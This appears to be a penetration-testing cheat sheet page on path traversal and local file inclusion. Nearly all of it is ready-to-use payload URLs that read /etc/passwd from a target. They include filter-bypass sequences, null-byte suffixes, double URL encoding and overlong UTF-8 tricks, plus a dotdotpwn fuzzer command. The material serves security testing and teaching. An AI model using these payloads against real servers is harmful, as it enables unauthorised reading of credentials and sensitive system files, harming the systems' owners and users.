Path Traversal/File Inclusion
Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:
Application code and data.
Credentials for back-end systems.
Sensitive operating system files.
Basic LFI and bypasses
http://example.com/home.php?id=../../../etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=..///////..////..//////etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=....\/....\/....\/etc/passwd
http://example.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
http://example.com/home.php?id=/var/www/../../etc/passwdNull Byte
Bypass by appending additional characters to the end of the provided string (bypassing: $_GET['param']."php")
http://example.com/home.php?id=../../../../etc/passwd%00
http://example.com/home.php?id=../../../../etc/passwd%00.jpg (append needed extension)This is solved since PHP 5.4
Encoding
You could use non-standard encondings like double URL encode:
http://example.com/home.php?id=..%252f..%252f..%252fetc%252fpasswd
http://example.com/home.php?id=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd%00
http://example.com/home.php?id=%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%2fpasswdFrom existent folder
It's possible that the back-end is verifying the folder path:
http://example.com/home.php?id=utils/scripts/../../../../../etc/passwdTools
It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
sudo ./dotdotpwn.pl -m http-url -u https://example.com/image?id=TRAVERSAL -O -k "root:"Wordlists
Last updated
Was this helpful?